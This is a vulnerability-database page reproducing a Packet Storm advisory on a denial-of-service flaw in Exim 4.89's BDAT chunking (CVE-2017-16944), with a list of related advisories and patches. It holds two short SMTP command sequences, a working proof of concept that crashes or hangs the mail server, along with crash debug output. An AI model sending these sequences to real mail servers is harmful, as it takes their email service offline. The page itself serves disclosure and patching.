Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMehPACKETSTORM:145152
HistoryNov 27, 2017 - 12:00 a.m.

Exim 4.89 Denial Of Service

2017-11-2700:00:00
meh
packetstormsecurity.com
49

0.877 High

EPSS

Percentile

98.4%

JSON
`While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.  
https://github.com/Exim/exim/blob/master/src/src/receive.c#L1867  
  
Exim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.  
https://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547  
  
Here is a simple PoC which leads to an infinite loop and program crash:  
  
EHLO localhost  
MAIL FROM:<test@localhost>  
RCPT TO:<test@localhost>  
BDAT 10  
.  
BDAT 0  
  
  
Part of debug info  
============================  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30502 SMTP>> 250 0 byte chunk received  
15:36:54 30502 chunking state 0  
15:36:54 30295 child 30502 ended: status=0x8b  
15:36:54 30295 signal exit, signal 11 (core dumped)  
15:36:54 30295 1 SMTP accept process now running  
15:36:54 30295 Listening...  
============================  
  
We also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.  
This can be triggered using the following command:  
  
EHLO localhost  
MAIL FROM:<test@localhost>  
RCPT TO:<test@localhost>  
BDAT 100  
.  
MAIL FROM:<test@localhost>  
RCPT TO:<test@localhost>  
BDAT 0 LAST  
  
// Tested on current master, ubuntu16.04.  
  
`

Related

osv 3
openvas 6
nessus 8
zdt 1
ubuntucve 1
checkpoint_advisories 1
redhatcve 1
prion 1
debiancve 1
alpinelinux 1
ubuntu 1
freebsd 1
cve 1
seebug 2
thn 1
fedora 2
amazon 1
debian 1
hackerone 1
gentoo 1
archlinux 1
suse 3
osv
osv
CVE-2017-16944
2017-11-25 17:29:00
CVE-2017-16943
2017-11-25 17:29:00
exim4 - security update
2017-11-30 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-3499-1)
2017-11-30 00:00:00
Fedora Update for exim FEDORA-2017-0053bb9719
2017-12-14 00:00:00
Debian: Security Advisory (DSA-4053-1)
2017-11-29 00:00:00
nessus
nessus
FreeBSD : exim -- remote DoS attack in BDAT processing (75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f)
2017-12-01 00:00:00
Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3499-1)
2017-11-30 00:00:00
Amazon Linux AMI : exim (ALAS-2017-932)
2017-12-26 00:00:00
zdt
zdt
Exim 4.89 - BDAT Denial of Service Exploit
2017-11-27 00:00:00
ubuntucve
ubuntucve
CVE-2017-16944
2017-11-27 00:00:00
checkpoint_advisories
checkpoint_advisories
Exim MTA BDAT Denial Of Service (CVE-2017-16944)
2017-11-29 00:00:00
redhatcve
redhatcve
CVE-2017-16944
2017-11-27 09:19:43
prion
prion
Design/Logic Flaw
2017-11-25 17:29:00
debiancve
debiancve
CVE-2017-16944
2017-11-25 17:29:00
alpinelinux
alpinelinux
CVE-2017-16944
2017-11-25 17:29:00
ubuntu
ubuntu
Exim vulnerability
2017-11-29 00:00:00
freebsd
freebsd
exim -- remote DoS attack in BDAT processing
2017-11-23 00:00:00
cve
cve
CVE-2017-16944
2017-11-25 17:29:00
seebug
seebug
Exim Use-After-Free(CVE-2017-16943)
2017-11-28 00:00:00
Exim 4.89 - 'BDAT' Denial of Service(CVE-2017-16944)
2017-11-29 00:00:00
thn
thn
Exim Internet Mailer Found Vulnerable to RCE And DoS Bugs; Patch Now
2017-11-26 22:54:00
fedora
fedora
[SECURITY] Fedora 27 Update: exim-4.89-7.fc27
2017-12-12 11:30:33
[SECURITY] Fedora 26 Update: exim-4.89-7.fc26
2017-12-12 13:46:34
amazon
amazon
Critical: exim
2017-12-20 18:51:00
debian
debian
[SECURITY] [DSA 4053-1] exim4 security update
2017-11-30 08:03:04
hackerone
hackerone
Internet Bug Bounty: Exim handles BDAT data incorrectly and leads to crash/hang
2017-12-11 15:59:10
gentoo
gentoo
Exim: Multiple vulnerabilities
2018-03-06 00:00:00
archlinux
archlinux
[ASA-201711-32] exim: multiple issues
2017-11-30 00:00:00
suse
suse
Security update for exim (critical)
2021-05-20 00:00:00
Security update for exim (critical)
2021-05-07 00:00:00
Security update for exim (critical)
2021-05-20 00:00:00

0.877 High

EPSS

Percentile

98.4%

JSON
Related for PACKETSTORM:145152
osv3openvas6nessus8zdt1ubuntucve1checkpoint_advisories1redhatcve1prion1debiancve1alpinelinux1ubuntu1freebsd1cve1seebug2thn1fedora2amazon1debian1hackerone1gentoo1archlinux1suse3